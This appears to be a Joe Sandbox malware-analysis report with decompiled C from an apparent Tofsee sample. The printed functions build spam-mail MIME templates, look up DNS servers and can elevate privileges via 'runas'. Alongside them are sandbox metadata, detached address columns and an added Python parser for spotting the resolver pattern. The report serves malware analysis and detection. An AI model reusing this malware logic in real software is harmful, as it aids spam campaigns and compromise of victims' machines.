                                                                                                                                  0x025173f1
                                                                                                                                  0x025173f2
                                                                                                                                  0x025173f4
                                                                                                                                  0x025173f7
                                                                                                                                  0x00000000
                                                                                                                                  0x025173f7
                                                                                                                                  0x02517362
                                                                                                                                  0x02517365
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251736d
                                                                                                                                  0x02517370
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517372
                                                                                                                                  0x02517375
                                                                                                                                  0x0251737a
                                                                                                                                  0x0251737c
                                                                                                                                  0x0251738d
                                                                                                                                  0x02517393
                                                                                                                                  0x02517395
                                                                                                                                  0x02517397
                                                                                                                                  0x02517397
                                                                                                                                  0x02517395
                                                                                                                                  0x0251739d
                                                                                                                                  0x025173a0
                                                                                                                                  0x025173a2
                                                                                                                                  0x025173a4
                                                                                                                                  0x025173a4
                                                                                                                                  0x025173a6
                                                                                                                                  0x025173a9
                                                                                                                                  0x025173b2
                                                                                                                                  0x025173b8
                                                                                                                                  0x025173b9
                                                                                                                                  0x025173bc
                                                                                                                                  0x025173c4
                                                                                                                                  0x025173ca
                                                                                                                                  0x025173cb
                                                                                                                                  0x025173cd
                                                                                                                                  0x00000000
                                                                                                                                  0x02517311
                                                                                                                                  0x02517314
                                                                                                                                  0x0251731a
                                                                                                                                  0x0251731d
                                                                                                                                  0x02517326
                                                                                                                                  0x0251732c
                                                                                                                                  0x0251732d
                                                                                                                                  0x00000000
                                                                                                                                  0x0251732d
                                                                                                                                  0x0251730f
                                                                                                                                  0x025172d0
                                                                                                                                  0x025172d6
                                                                                                                                  0x00000000
                                                                                                                                  0x0251728e
                                                                                                                                  0x02517291
                                                                                                                                  0x02517297
                                                                                                                                  0x0251729a
                                                                                                                                  0x025172a3
                                                                                                                                  0x025172a9
                                                                                                                                  0x025172aa
                                                                                                                                  0x025172aa
                                                                                                                                  0x025172ac
                                                                                                                                  0x025172af
                                                                                                                                  0x025172b2
                                                                                                                                  0x025171cb
                                                                                                                                  0x025171cf
                                                                                                                                  0x025171cf
                                                                                                                                  0x0251728c
                                                                                                                                  0x02517208
                                                                                                                                  0x0251720e
                                                                                                                                  0x02517212
                                                                                                                                  0x0251721b
                                                                                                                                  0x02517221
                                                                                                                                  0x02517224
                                                                                                                                  0x00000000
                                                                                                                                  0x02517224
                                                                                                                                  0x0251713d
                                                                                                                                  0x02517142
                                                                                                                                  0x02517143
                                                                                                                                  0x02517145
                                                                                                                                  0x0251715e
                                                                                                                                  0x02517166
                                                                                                                                  0x0251716b
                                                                                                                                  0x00000000
                                                                                                                                  0x0251716b
                                                                                                                                  0x0251714b
                                                                                                                                  0x02517154
                                                                                                                                  0x0251715a
                                                                                                                                  0x0251715c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251715c
                                                                                                                                  0x025171b2
                                                                                                                                  0x00000000
                                                                                                                                  0x025171b2

APIs
• RegOpenKeyExA.ADVAPI32(80000001,00000000,00000101,761B43E0,?,761B43E0,00000000), ref: 025170C2
• RegEnumValueA.ADVAPI32 ref: 0251719E
• RegCloseKey.ADVAPI32(761B43E0,?,761B43E0,00000000), ref: 025171B2
• RegCloseKey.ADVAPI32(761B43E0), ref: 02517208
• RegCloseKey.ADVAPI32(761B43E0), ref: 02517291
• ___ascii_stricmp.LIBCMT ref: 025172C2
• RegCloseKey.ADVAPI32(761B43E0), ref: 025172D0
• RegCloseKey.ADVAPI32(761B43E0), ref: 02517314
• GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0251738D
• RegCloseKey.ADVAPI32(761B43E0), ref: 025173D8
  • Part of subcall function 0251F1A5: lstrlenA.KERNEL32(000000C8,000000E4,025222F8,000000C8,02517150,?), ref: 0251F1AD
Strings
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
• String ID: $"
• API String ID: 4293430545-3817095088
• Opcode ID: 55d292ca7f21405bf0968e235df08aa1c3f6380728fc541ecc038196b8a5bdee
• Instruction ID: 51f4905a52b6ff92bdaa923a4f5d72c76113e9f50b3239dee54882fa27231389
• Opcode Fuzzy Hash: 55d292ca7f21405bf0968e235df08aa1c3f6380728fc541ecc038196b8a5bdee
• Instruction Fuzzy Hash: D3B1837184421AAEFF159FA4DC45BEEBBB9FF48300F100566F911E6090EB719A84CF68
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E0251AD89(void* __ecx, void* __eflags) {
                                                                                                                                  				signed int _t48;
                                                                                                                                  				signed int _t50;
                                                                                                                                  				void* _t53;
                                                                                                                                  				intOrPtr _t55;
                                                                                                                                  				void* _t76;
                                                                                                                                  				signed int _t77;
                                                                                                                                  				void* _t81;
                                                                                                                                  				CHAR* _t92;
				void* _t94;
				void* _t96;
				void* _t98;

				_t76 = __ecx;
				_t94 = _t96 - 0x74;
				/* Current local time, converted to a FILETIME, seeds the boundary and Message-ID strings below. */
				GetLocalTime(_t94 + 0x50);
				SystemTimeToFileTime(_t94 + 0x50, _t94 + 0x64);
				/* Zero a 0x80-byte buffer and fill it with the host name (subcall 0251AD08 falls back to "LocalHost"). */
				E0251EE2A(_t76, _t94 - 0x110, 0, 0x80);
				E0251AD08(_t94 - 0x110);
				_t98 = _t96 - 0x184 + 0x10;
				/* Host address: "127.0.0.1" if resolution failed, otherwise the inet_ntoa string (subcall 0251A7A3). */
				if(E025130B5() == 0) {
					 *((intOrPtr*)(_t94 + 0x6c)) = "127.0.0.1";
				} else {
					_push(_t94 - 0x90);
					 *((intOrPtr*)(_t94 + 0x6c)) = E0251A7A3(_t47, _t47);
				}
				/* Two pseudo-random values give a counter base in the range 0xb..0x19. */
				_t48 = E0251ECA5();
				_t77 = 0xe;
				_t50 = E0251ECA5();
				_t92 = "%OUTLOOK_BND_";
				 *((intOrPtr*)(_t94 + 0x70)) = (_t50 & 0x00000001) + _t48 % _t77 + 0xb;
				/* For each %OUTLOOK_BND_<n> placeholder still in the template, generate a MIME boundary string. */
				_t53 = E0251EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				while(1) {
					_t103 = _t53;
					if(_t53 == 0) {
						break;
					}
					_t55 = E0251EDAC(_t53 + 0xd);
					_t81 =  *((intOrPtr*)(_t94 + 0x70)) + _t55;
					__eflags = _t81;
					 *((intOrPtr*)(_t94 + 0x60)) = _t55;
					wsprintfA(_t94 - 0x70, "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX", _t55, _t81,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64));
					wsprintfA(_t94 + 0x10, "%s%d", _t92,  *((intOrPtr*)(_t94 + 0x60)));
					E0251EF7C(__eflags,  *((intOrPtr*)(_t94 + 0x7c)), _t94 + 0x10, _t94 - 0x70, 0x3e800, 0);
					_t98 = _t98 + 0x40;
					_t53 = E0251EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				}
				/* Message-ID built from the counter, the FILETIME halves and the host address, then the %OUTLOOK_MID and %OUTLOOK_HST placeholders are substituted. */
				wsprintfA(_t94 - 0x70, "%04x%08.8lx$%08.8lx$%08x@%s",  *((intOrPtr*)(_t94 + 0x70)) + 3,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64),  *((intOrPtr*)(_t94 + 0x6c)), _t94 - 0x110);
				E0251EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_MID", _t94 - 0x70, 0x3e800, 0);
				return E0251EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_HST", _t94 - 0x110, 0x3e800, 0);
			}

APIs
• GetLocalTime.KERNEL32(?), ref: 0251AD98
• SystemTimeToFileTime.KERNEL32(?,?), ref: 0251ADA6
  • Part of subcall function 0251AD08: gethostname.WS2_32(?,00000080), ref: 0251AD1C
  • Part of subcall function 0251AD08: lstrlenA.KERNEL32(00000000), ref: 0251AD60
  • Part of subcall function 0251AD08: lstrlenA.KERNEL32(00000000), ref: 0251AD69
  • Part of subcall function 0251AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0251AD7F
  • Part of subcall function 025130B5: gethostname.WS2_32(?,00000080), ref: 025130D8
  • Part of subcall function 025130B5: gethostbyname.WS2_32(?), ref: 025130E2
• wsprintfA.USER32 ref: 0251AEA5
  • Part of subcall function 0251A7A3: inet_ntoa.WS2_32(?), ref: 0251A7A9
• wsprintfA.USER32 ref: 0251AE4F
• wsprintfA.USER32 ref: 0251AE5E
  • Part of subcall function 0251EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0251EF92
  • Part of subcall function 0251EF7C: lstrlenA.KERNEL32(?), ref: 0251EF99
  • Part of subcall function 0251EF7C: lstrlenA.KERNEL32(00000000), ref: 0251EFA0
Strings
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
• String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
• API String ID: 3631595830-1816598006
• Opcode ID: 87f34d37e3a7451126e97ce5d55559a067c694b1b95800e99af6a1869318d825
• Instruction ID: 8d66bd6b0051b70399246d62ce8ddb11db673df6229470a49fadbf884361d335
• Opcode Fuzzy Hash: 87f34d37e3a7451126e97ce5d55559a067c694b1b95800e99af6a1869318d825
• Instruction Fuzzy Hash: 48413DB290021DABEF25AFA0CC46EEE3BADFB59300F14041ABD1592191EA71D558CF68
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 55%
			E02512DF2(intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				intOrPtr _v28;
				short _v30;
				char _v32;
				struct HINSTANCE__* _t18;
				void* _t22;
				signed int _t23;
				short _t27;
				signed int _t31;
				intOrPtr* _t35;
				intOrPtr* _t37;
				CHAR* _t38;
				void* _t40;

				/* Resolve GetNetworkParams from iphlpapi.dll at run time (no import-table entry). */
				_t38 = "iphlpapi.dll";
				_t18 = GetModuleHandleA(_t38);
				if(_t18 == 0 || _t18 == 0xffffffff) {
					_t18 = LoadLibraryA(_t38);
				}
				if(_t18 == 0 || _t18 == 0xffffffff) {
					L18:
					return 0;
				} else {
					_t35 = GetProcAddress(_t18, "GetNetworkParams");
					if(_t35 == 0) {
						goto L18;
					}
					/* 0x4000-byte FIXED_INFO buffer filled by GetNetworkParams. */
					_t22 = HeapAlloc(GetProcessHeap(), 0, 0x4000);
					_t33 =  &_v16;
					_v8 = _t22;
					_v16 = 0x4000;
					_t23 =  *_t35(_t22,  &_v16);
					if(_t23 != 0) {
						goto L18;
					}
					_v12 = _v12 & _t23;
					/* +0x10c is FIXED_INFO.DnsServerList, an IP_ADDR_STRING linked list: Next pointer at +0, IpAddress string at +4. */
					_t37 = _v8 + 0x10c;
					if(_t37 == 0) {
						L17:
						HeapFree(GetProcessHeap(), 0, _v8);
						return _v12;
					} else {
						goto L8;
					}
					/* Walk the configured DNS servers and hand each one, as a sockaddr_in on port 53, to E02512CEB. */
					do {
						L8:
						_t40 = _t37 + 4;
						if(_t40 == 0) {
							goto L16;
						}
						_t27 = 2;
						_v32 = _t27;                  /* sin_family = AF_INET */
						__imp__#9(0x35);              /* ws2_32 ordinal 9: htons(53) */
						_v30 = _t27;                  /* sin_port */
						__imp__#11(_t40);             /* ws2_32 ordinal 11: inet_addr(IpAddress) */
						_v28 = _t27;                  /* sin_addr */
						if(_t27 == 0 || _t27 == 0xffffffff) {
							/* Not a dotted-quad literal: resolve it via ws2_32 ordinal 52, gethostbyname, and take h_addr_list[0]. */
							__imp__#52(_t40);
							if(_t27 == 0) {
								goto L16;
							}
							_t27 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc))))));
							_v28 = _t27;
							goto L13;
						} else {
							L13:
							if(_t27 != 0 && _t27 != 0xffffffff) {
								/* First server for which E02512CEB succeeds ends the loop; its result is returned. */
								_t31 = E02512CEB(_t33,  &_v32, _a4);
								_pop(_t33);
								_v12 = _t31;
								if(_t31 != 0) {
									goto L17;
								}
							}
						}
						L16:
						_t37 =  *_t37;
					} while (_t37 != 0);
					goto L17;
				}
			}
                                                                                                                                  0x00000000
                                                                                                                                  0x02512e81
                                                                                                                                  0x02512e84
                                                                                                                                  0x02512e88
                                                                                                                                  0x02512e8f
                                                                                                                                  0x02512e93
                                                                                                                                  0x02512e99
                                                                                                                                  0x02512e9e
                                                                                                                                  0x02512ea6
                                                                                                                                  0x02512eae
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512eb5
                                                                                                                                  0x02512eb7
                                                                                                                                  0x00000000
                                                                                                                                  0x02512eba
                                                                                                                                  0x02512eba
                                                                                                                                  0x02512ebc
                                                                                                                                  0x02512eca
                                                                                                                                  0x02512ed0
                                                                                                                                  0x02512ed1
                                                                                                                                  0x02512ed6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512ed6
                                                                                                                                  0x02512ebc
                                                                                                                                  0x02512ed8
                                                                                                                                  0x02512ed8
                                                                                                                                  0x02512eda
                                                                                                                                  0x00000000
                                                                                                                                  0x02512e78

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(iphlpapi.dll,7620EA30,?,000DBBA0,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512E01
                                                                                                                                  • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512E11
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 02512E2E
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512E4C
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512E4F
                                                                                                                                  • htons.WS2_32(00000035), ref: 02512E88
                                                                                                                                  • inet_addr.WS2_32(?), ref: 02512E93
                                                                                                                                  • gethostbyname.WS2_32(?), ref: 02512EA6
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512EE3
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512EE6
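The call sequence above is the signature of a small name-resolution helper: iphlpapi.dll is loaded at run time and GetNetworkParams resolved by name (so the DLL never appears in the static import table), GetNetworkParams returns the host's configured DNS server list, htons(0x35) is port 53, and inet_addr/gethostbyname do the actual lookup. The following parser is an added example, not code from the report or from the sample: it reads Joe Sandbox "APIs" annotation lines in the exact format shown above (the ten lines for this function are embedded as input), links each GetProcAddress export to the DLL named in the preceding LoadLibrary/GetModuleHandle call, decodes the htons port, and applies a simple resolver heuristic. The heuristic is this example's own, not a Joe Sandbox signature.

```python
"""Parse Joe Sandbox 'APIs' annotation lines and flag a DNS-resolver pattern.

Added example: not part of the Joe Sandbox report or of the Tofsee sample.
The line format (bullet, API.MODULE(args), ref: address) is taken from the
report; the resolver verdict is this example's own heuristic.
"""
import re
from dataclasses import dataclass
from typing import Optional

# The ten annotation lines exactly as the report lists them for this function.
REPORT_API_LINES = """\
• GetModuleHandleA.KERNEL32(iphlpapi.dll,7620EA30,?,000DBBA0,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512E01
• LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512E11
• GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 02512E2E
• GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512E4C
• HeapAlloc.KERNEL32(00000000,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512E4F
• htons.WS2_32(00000035), ref: 02512E88
• inet_addr.WS2_32(?), ref: 02512E93
• gethostbyname.WS2_32(?), ref: 02512EA6
• GetProcessHeap.KERNEL32(00000000,?,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512EE3
• HeapFree.KERNEL32(00000000,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512EE6
"""

# bullet, API name, module, argument list, call-site address
LINE_RE = re.compile(
    r"^\u2022?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list  # raw argument tokens; '?' means the decompiler could not recover it
    ref: int    # call-site address


def parse_api_lines(text: str) -> list:
    """Return one ApiCall per annotation line; non-matching lines are skipped."""
    calls = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        args = m.group("args").split(",") if m.group("args") else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def dynamic_imports(calls) -> dict:
    """Map each GetProcAddress export name to the DLL named in the most recent
    LoadLibrary*/GetModuleHandle* call. The module handle argument is 00000000
    in the dump (unknown statically), so call order is the only available link."""
    resolved = {}
    current_dll: Optional[str] = None
    for c in calls:
        if c.api.startswith(("LoadLibrary", "GetModuleHandle")) and c.args and c.args[0] != "?":
            current_dll = c.args[0]
        elif c.api == "GetProcAddress" and len(c.args) >= 2:
            resolved[c.args[1]] = current_dll
    return resolved


def htons_ports(calls) -> list:
    """Port numbers passed to htons(); the decompiler prints immediates in hex."""
    return [int(c.args[0], 16) for c in calls
            if c.api == "htons" and c.args and c.args[0] != "?"]


def looks_like_dns_resolver(calls) -> bool:
    """Heuristic (this example's own): host DNS config via GetNetworkParams,
    port 53 in network byte order, and a Winsock name-lookup call."""
    imports = dynamic_imports(calls)
    apis = {c.api for c in calls}
    return (
        (imports.get("GetNetworkParams") or "").lower() == "iphlpapi.dll"
        and 53 in htons_ports(calls)
        and bool(apis & {"gethostbyname", "getaddrinfo"})
    )


if __name__ == "__main__":
    parsed = parse_api_lines(REPORT_API_LINES)
    print("dynamic imports:", dynamic_imports(parsed))
    print("htons ports:", htons_ports(parsed))
    print("resolver-like:", looks_like_dns_resolver(parsed))
```

The same parser can be pointed at the "APIs" block of any other function in the report; only the heuristic at the end is specific to this resolver pattern, and the late-bound iphlpapi.dll import is the detail worth carrying into a hunting query, since a static import scan would not show it.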
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                                                                  • String ID: GetNetworkParams$iphlpapi.dll
                                                                                                                                  • API String ID: 929413710-2099955842
                                                                                                                                  • Opcode ID: 2ed21206c85c5f46379c3694fccb8505ad8dff234ef599e45ed4f3b75b1685e9
                                                                                                                                  • Instruction ID: d262c70d4fc8422470d854649a911eba9bfa1e73e89d7deb229b0aa2ec2d4b23
                                                                                                                                  • Opcode Fuzzy Hash: 2ed21206c85c5f46379c3694fccb8505ad8dff234ef599e45ed4f3b75b1685e9
                                                                                                                                  • Instruction Fuzzy Hash: D531D335E4122AABEB209FB89C44B7E7BB8BF16324F150615ED14E72C0D730C5459B5C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                  			E02519326(void* __ecx, void* __edx) {
                                                                                                                                  				void* __ebx;
                                                                                                                                  				char _t88;
                                                                                                                                  				void* _t89;
                                                                                                                                  				int _t92;
                                                                                                                                  				void* _t96;
                                                                                                                                  				signed int _t97;
                                                                                                                                  				signed int _t100;
                                                                                                                                  				signed int _t103;
                                                                                                                                  				char* _t106;
                                                                                                                                  				char* _t111;
                                                                                                                                  				signed int _t112;
                                                                                                                                  				char* _t116;
                                                                                                                                  				signed int _t117;
                                                                                                                                  				int _t119;
                                                                                                                                  				void* _t146;
                                                                                                                                  				signed int _t155;
                                                                                                                                  				int _t161;
                                                                                                                                  				signed int _t165;
                                                                                                                                  				signed int _t167;
                                                                                                                                  				void* _t168;
                                                                                                                                  				void* _t170;
                                                                                                                                  				void* _t172;
                                                                                                                                  				void* _t173;
                                                                                                                                  				void* _t175;
                                                                                                                                  				void* _t176;
                                                                                                                                  
                                                                                                                                  				_t146 = __ecx;
                                                                                                                                  				_t168 = _t170 - 0x60;
                                                                                                                                  				E02511910(0x19bc);
                                                                                                                                  				 *(_t168 - 0x58) = 0x9c;
                                                                                                                                  				if(GetVersionExA(_t168 - 0x58) == 0) {
                                                                                                                                  					 *(_t168 - 0x4c) =  *(_t168 - 0x4c) & 0x00000000;
                                                                                                                                  					_t9 = _t168 + 0x58;
                                                                                                                                  					 *_t9 =  *(_t168 + 0x58) & 0x00000000;
                                                                                                                                  					__eflags =  *_t9;
                                                                                                                                  				} else {
                                                                                                                                  					 *(_t168 + 0x58) = ( *(_t168 - 0x54) << 4) +  *((intOrPtr*)(_t168 - 0x50));
                                                                                                                                  				}
                                                                                                                                  				_t88 = GetModuleFileNameA(GetModuleHandleA(0), _t168 - 0x15c, 0x104);
                                                                                                                                  				if(_t88 == 0) {
                                                                                                                                  					 *(_t168 - 0x15c) = _t88;
                                                                                                                                  				}
                                                                                                                                  				_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                                                                  				_t89 = _t168 - 0x15c;
                                                                                                                                  				if( *(_t168 + 0x78) == 0) {
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                                                                  					_push(_t89);
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x68)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x6c)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                                                                  					_t92 = wsprintfA(_t168 - 0x95c, E02512544(0x25222f8,  &E02520918, 0xbd, 0xe4, 0xc8));
                                                                                                                                  					_t172 = _t170 + 0x40;
                                                                                                                                  				} else {
                                                                                                                                  					_push(_t89);
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x68)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x6c)));
                                                                                                                                  					_t92 = wsprintfA(_t168 - 0x95c, E02512544(0x25222f8, 0x25209d8, 0x4d, 0xe4, 0xc8));
                                                                                                                                  					_t172 = _t170 + 0x38;
                                                                                                                                  				}
                                                                                                                                  				 *(_t168 + 0x78) = _t92;
                                                                                                                                  				E0251EE2A(_t146, 0x25222f8, 0, 0x100);
                                                                                                                                  				_t173 = _t172 + 0xc;
                                                                                                                                  				if( *(_t168 + 0x58) >= 0x60 &&  *((intOrPtr*)(_t168 + 0x7c)) != 0) {
                                                                                                                                  					E0251EF00(_t168 - 0x15c, E02516CC9(_t146));
                                                                                                                                  					E0251EF1E(_t168 - 0x15c, E02512544(0x25222f8,  &E0252090C, 0xc, 0xe4, 0xc8));
                                                                                                                                  					_push(_t168 - 0x15c);
                                                                                                                                  					wsprintfA(_t168 +  *(_t168 + 0x78) - 0x95c, E02512544(0x25222f8,  &E02520888, 0x82, 0xe4, 0xc8));
                                                                                                                                  					E0251EE2A(_t146, 0x25222f8, 0, 0x100);
                                                                                                                                  					_t173 = _t173 + 0x50;
                                                                                                                                  				}
                                                                                                                                  				 *(_t168 + 0x78) =  *(_t168 + 0x78) & 0x00000000;
                                                                                                                                  				 *(_t168 + 0x5c) = E02516EDD();
                                                                                                                                  				if( *(_t168 + 0x58) < 0x60) {
                                                                                                                                  					_t165 =  *(_t168 + 0x78);
                                                                                                                                  					_t161 = 0;
                                                                                                                                  					__eflags = 0;
                                                                                                                                  					L33:
                                                                                                                                  					__eflags =  *(_t168 + 0x5c) - _t161;
                                                                                                                                  					if( *(_t168 + 0x5c) == _t161) {
                                                                                                                                  						L38:
                                                                                                                                  						_push(_t168 - 0x95c);
                                                                                                                                  						_push(_t161);
                                                                                                                                  						L39:
                                                                                                                                  						_t96 = E025191EB();
                                                                                                                                  						__eflags =  *0x2522180 - _t161; // 0x0
                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                  							 *0x2522180 =  *0x2522180 | _t165;
                                                                                                                                  							__eflags =  *0x2522180;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t96 - 0x2a;
                                                                                                                                  						_t81 = _t96 == 0x2a;
                                                                                                                                  						__eflags = _t81;
                                                                                                                                  						_t97 = 0 | _t81;
                                                                                                                                  						L42:
                                                                                                                                  						return _t97;
                                                                                                                                  					}
                                                                                                                                  					_t100 = E02511820(_t168 + 0x54, _t168 + 0x78);
                                                                                                                                  					__eflags = _t100;
                                                                                                                                  					if(_t100 != 0) {
                                                                                                                                  						_push(_t168 - 0x95c);
                                                                                                                                  						_push("runas");
                                                                                                                                  						goto L39;
                                                                                                                                  					}
                                                                                                                                  					_t103 =  *(_t168 + 0x78) | 0x5e0d0000;
                                                                                                                                  					__eflags = _t103;
                                                                                                                                  					 *0x2522180 = _t103;
                                                                                                                                  					 *0x252217c =  *(_t168 + 0x54);
                                                                                                                                  					if(_t103 != 0) {
             *0x2522180 = _t103 | _t165;
        }
        L31:
        _t97 = 0;
        goto L42;
    }
     *(_t168 + 0x4c) = 4;
     *(_t168 + 0x44) = 5;
     *(_t168 + 0x48) = 1;
    _t106 = E02512544(0x25222f8,  &E0252084C, 0x3a, 0xe4, 0xc8);
    _t175 = _t173 + 0x14;
    if(RegOpenKeyExA(0x80000002, _t106, 0, 0x101, _t168 + 0x50) == 0) {
        _t111 = E02512544(0x25222f8, 0x2520830, 0x1b, 0xe4, 0xc8);
        _t176 = _t175 + 0x14;
        _t112 = RegQueryValueExA( *(_t168 + 0x50), _t111, 0, _t168 + 0x54, _t168 + 0x44, _t168 + 0x4c);
        __eflags = _t112;
        if(_t112 == 0) {
            _t116 = E02512544(0x25222f8, 0x2520818, 0x16, 0xe4, 0xc8);
            _t176 = _t176 + 0x14;
            _t117 = RegQueryValueExA( *(_t168 + 0x50), _t116, 0, _t168 + 0x54, _t168 + 0x48, _t168 + 0x4c);
            __eflags = _t117;
            if(_t117 != 0) {
                 *(_t168 + 0x78) = 0x3000;
            }
        } else {
             *(_t168 + 0x78) = 0x2000;
        }
        RegCloseKey( *(_t168 + 0x50));
        _t165 =  *(_t168 + 0x78);
    } else {
        _t165 = 0x1000;
    }
    _t161 = 0;
    if( *(_t168 + 0x44) != 0 ||  *(_t168 + 0x48) != 0) {
        if( *(_t168 + 0x5c) <= _t161) {
            goto L38;
        }
        _t119 =  *(_t168 - 0x4c);
        if( *(_t168 + 0x58) < 0x61 || _t119 < 0x1db0) {
             *0x252217c = _t119;
            _t167 = _t165 | 0x5e0d0106;
            __eflags = _t167;
            goto L30;
        } else {
            if(E0251F0E4(_t168 - 0x95c, _t168 - 0x195c, 0x800) == 0) {
                 *0x252217c = _t161;
                _t167 = _t165 | 0x5e0d0107;
                L30:
                 *0x2522180 = _t167;
                goto L31;
            }
            _t97 = E025118E0(0xc8, _t168 - 0x195c, _t168 + 0x5c, _t168 + 0x78);
            if(_t97 == _t161) {
                _t155 =  *(_t168 + 0x78) | 0x5e0d0000;
                 *0x2522180 = _t155;
                 *0x252217c =  *(_t168 + 0x5c);
                if(_t155 != 0) {
                     *0x2522180 = _t155 | _t165;
                }
            }
            goto L42;
        }
    } else {
        goto L33;
    }
}

Instruction addresses for the decompiled function above: the report's per-line address column (0x02519326 to 0x025196A9, with 0x00000000 on lines that carry no instruction) was separated from the code during extraction and cannot be re-aligned line by line here.

APIs
• GetVersionExA.KERNEL32(?,?,02519DD7,?,00000022,?,?,00000000,00000001), ref: 02519340
• GetModuleHandleA.KERNEL32(00000000,?,00000104,?,02519DD7,?,00000022,?,?,00000000,00000001), ref: 0251936E
• GetModuleFileNameA.KERNEL32(00000000,?,02519DD7,?,00000022,?,?,00000000,00000001), ref: 02519375
• wsprintfA.USER32 ref: 025193CE
• wsprintfA.USER32 ref: 0251940C
• wsprintfA.USER32 ref: 0251948D
• RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 025194F1
• RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 02519526
• RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 02519571
Strings
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
